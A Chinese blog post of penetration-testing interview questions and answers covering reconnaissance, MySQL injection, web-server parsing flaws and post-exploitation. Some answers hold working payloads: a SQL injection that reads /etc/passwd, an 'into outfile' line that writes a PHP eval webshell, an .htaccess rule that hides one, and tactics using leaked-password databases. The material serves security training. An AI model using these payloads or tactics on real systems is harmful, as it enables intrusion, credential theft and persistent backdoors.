首页 > 其他分享 >黑客渗透知识总结

黑客渗透知识总结

时间:2024-03-20 14:29:05浏览次数:33  
标签:总结 5.0 渗透 端口 网站 黑客 mysql php

目录

渗透测试工程师面试题大全

知孤云出岫 整理

1.拿到一个待检测的站,你觉得应该先做什么?

2.mysql 的网站注入,5.0 以上和 5.0 以下有什么区别?

3.在渗透过程中,收集目标站注册人邮箱对我们有什么价值?

4.判断出网站的 CMS 对渗透有什么意义?

5.一个成熟并且相对安全的 CMS,渗透时扫目录的意义?

6.常见的网站服务器容器?

7.mysql 注入点,用工具对目标站直接写入一句话,需要哪些条件?

8.目前已知哪些版本的容器有解析漏洞,具体举例?

9、如何手工快速判断目标站是 windows 还是 linux 服务器?

10.为何一个 mysql 数据库的站,只有一个 80 端口开放?

11.3389 无法连接的几种情况?

12.在某后台新闻编辑界面看到编辑器,应该先做什么?

13.拿到一个 webshell 发现网站根目录下有.htaccess 文件,我们能做什么?

14.注入漏洞只能查账号密码?



渗透测试工程师面试题大全

知孤云出岫 整理


1.拿到一个待检测的站,你觉得应该先做什么?

        收集信息:whois、网站源 IP、旁站、C 段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说...

2.mysql 的网站注入,5.0 以上和 5.0 以下有什么区别?

        5.0 以下没有 information_schema 这个系统表,无法列表名等,只能暴力跑表名;5.0 以下是多用户单操作,5.0 以上是多用户多操做。

3.在渗透过程中,收集目标站注册人邮箱对我们有什么价值?

  (1)丢社工库里看看有没有泄露密码,然后尝试用泄露的密码进行登录后台
  (2)用邮箱做关键词进行丢进搜索引擎
  (3)利用搜索到的关联信息找出其他邮箱进而得到常用社交账号
  (4)社工找出社交账号,里面或许会找出管理员设置密码的习惯
  (5)利用已有信息生成专用字典
 (6) 观察管理员常逛哪些非大众性网站,拿下它,你会得到更多好东西

4.判断出网站的 CMS 对渗透有什么意义?

        查找网上已曝光的程序漏洞,如果开源,还能下载相对应的源码进行代码审计。

5.一个成熟并且相对安全的 CMS,渗透时扫目录的意义?

        (1)敏感文件、二级目录扫描

        (2)站长的误操作比如:网站备份的压缩文件、说明.txt、二级目录可能存放着其他站点

6.常见的网站服务器容器?

        IIS、Apache、nginx、Tomcat,weblogic、jboss

7.mysql 注入点,用工具对目标站直接写入一句话,需要哪些条件?

root 权限以及网站的绝对路径load_file()读取文件操作

前提:

知道文件的绝对路径能够使用union 查询

对 web 目录有写的权限

union select 1,load_file('/etc/passwd'),3,4,5# 0x2f6574632f706173737764

           union select 1,load_file(0x2f6574632f706173737764),3,4,5# 路径没有加单引号的话  必须转换十六进制

要是想省略单引号的话必须转换十六进制into outfile 写入文件操作

前提:

文件名必须是全路径(绝对路径) 用户必须有写文件的权限

没有对单引号'过滤

select '<?php phpinfo(); ?>' into outfile 'C:\Windows\tmp\8.php' select '<?php @eval($_POST["admin"]); ?>' into outfile

'C:\Windows\tmp\8.php'

路径里面两个反斜杠\可以换成一个正斜杠/

PHP 语句没有单引号的话,必须转换成十六进制要是想省略单引号'的话,必须转换成十六进制

<?php eval($_POST["admin"]); ?> 或 者 <?php eval($_GET["admin"]); ?>

<?php @eval($_POST["admin"]); ?>

<?php phpinfo(); ?>

<?php eval($_POST["admin"]); ?>

建议一句话 PHP 语句转换成十六进制

8.目前已知哪些版本的容器有解析漏洞,具体举例?

    (1)IIS 6.0

/xx.asp/xx.jpg "xx.asp"是文件夹名

(2) IIS 7.0/7.5

默认 Fast-CGI 开启,直接在 url 中图片地址后面输入/1.php,会把正常图片当成 php 解析

   (3)Nginx

   版本小于等于 0.8.37,利用方法和 IIS 7.0/7.5 一样,Fast-CGI 关闭情况下也可利用。

空字节代码 xxx.jpg.php

   (4)Apache

上传的文件命名为:test.php.x1.x2.x3,Apache 是从右往左判断后缀

(5)lighttpd xx.jpg/xx.php

9、如何手工快速判断目标站是 windows 还是 linux 服务器?

linux 大小写敏感,windows 大小写不敏感

10.为何一个 mysql 数据库的站,只有一个 80 端口开放?

  • 更改了端口,没有扫描出来
  • 站库分离
  • 3306 端口不对外开放
11.3389 无法连接的几种情况?

(1)没开放 3389 端口
(2)端口被修改

     (3)防护拦截
     (4)处于内网(需进行端口转发)

12.在某后台新闻编辑界面看到编辑器,应该先做什么?

        查看编辑器的名称版本,然后搜索公开的漏洞

13.拿到一个 webshell 发现网站根目录下有.htaccess 文件,我们能做什么?

能做的事情很多,用隐藏网马来举例子:

插入<FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php

</FilesMatch>

.jpg 文件会被解析成.php 文件

14.注入漏洞只能查账号密码?

        可脱裤,可上传 webshell,可执行命令

标签:总结,5.0,渗透,端口,网站,黑客,mysql,php
From: https://blog.csdn.net/weixin_59383576/article/details/136809951

相关文章

  • MySQL数据库安装与语句总结
    mysql语句总结创建--create创建<create>createdatabase数据库名[charset=utf8];createtable数据表名((字段类型约束[,字段类型约束])|--级联删除/级联更新ondelete/updatecascade[[constraint外键名]foreignkey(字段)references表名......
  • 触摸屏显示器的电容屏与电阻屏特点总结
    企业生产触摸屏显示器的电容屏与电阻屏特点信息收集总结,相比差异如下:一、电容屏主要特点:1、高灵敏度:电容屏的触摸体验通常更好,因为它们不需要施加压力来操作,只需用手指轻轻触摸屏幕即可。2、多点触控能力:电容屏支持同时识别多个触摸点,这使得它们非常适合于需要频繁进行多点操作......
  • Redis数据库安装与使用总结
    Redis语句总结一、基本概念Redis全称:RemoteDictionaryServer(远程字典服务器)的缩写,以字典结构存储数据,并允许其他应用通过TCP协议读写字典中的内容。使用C语言编写,并以内存作为数据存储介质,所以读写数据的效率极高*redis的官方只提供了linux版本的redis,window系统的redis......
  • 【小猪学渗透】打靶第2天:DVWA入门:暴力破解、命令注入、文件上传
    暴力破解low题目界面如上先抓个包试试,发送到intruder可以看到用GET数据包传输,username和password都是直接写在了url上在password后面的数字上加上$123$这样好进行替换。报错,没有加载字典,在知乎上找到了一篇文章讲字典的找到了一个老的字典库开始攻击,发现......
  • 【小猪学渗透】打靶第1天:DVWA入门:SQL注入、SQL盲注
    前言小猪同学正式开始了渗透测试的学习,今天是入门打靶DWVA--真是开心的一天呢--参考文章这是一篇来自于csdn的攻略文开始-环境搭建小猪同学已经事先搭建好了靶场。sql手工注入low输入1and1=1判断注入点输入1’and1=1报错发现注入点,受到单引号闭合的影响......
  • C/C++开发问题总结
    1.结构体sizeof问题Linux支持指定结构体比特字段,Windows不支持指定结构体比特字段structindex{longlongstart=0;longlongend=0;unsignedlonglongix=0;shortsegment=0;unsignedshortt:2;unsignedlonglongseq:(64-18);......
  • 多模态大模型论文总结
    A survey of resource-efficient llm and multimodal foundation models大型基础模型,包括大型语言模型(LLM)、视觉变压器(ViT)、扩散和基于LLM的多模态模型,正在彻底改变从培训到部署的整个机器学习生命周期。然而,这些模型在多功能性和性能方面的实质性进步在硬件资源......
  • 3.20每日总结
    1.5.1      需求层次-方面矩阵使用二维需求矩阵来判断需求是否全面。这个是目前我见到的最具可操作性的方法。一方面,需求是分层次的,根据涉众的不同,可将需求分为三个客户级需求(也称组织级需求)、用户级需求和开发级需求;另一方面,需求可分为功能、质量和约束三个方面。通过检......
  • 今日总结
    软件体系架构课堂测试–架构分析 班级:信2105-3   学号:20214005     姓名:赵悦恒阅读下列案例,回答相关问题:某大银行的一位银行卡办公室的收账经理Liz遇到了一个问题。她每周都收到一份过期未付款的账户名单。这份报告已经从两年前的250个账户增加到现在的1250个账户。......
  • 第四章总结(页面组件)
    4.1组件的定义及属性   组件是页面视图层(WXML)的基本组成单元,组件组合可以构建功能强大的页面结构。小程序框架为开发者提供了容器视图、基础内容、表单、导航、多媒体、地图、画布、开放能力等8类(30多个)基础组件。   每一个组件都由一对标签组成,有开......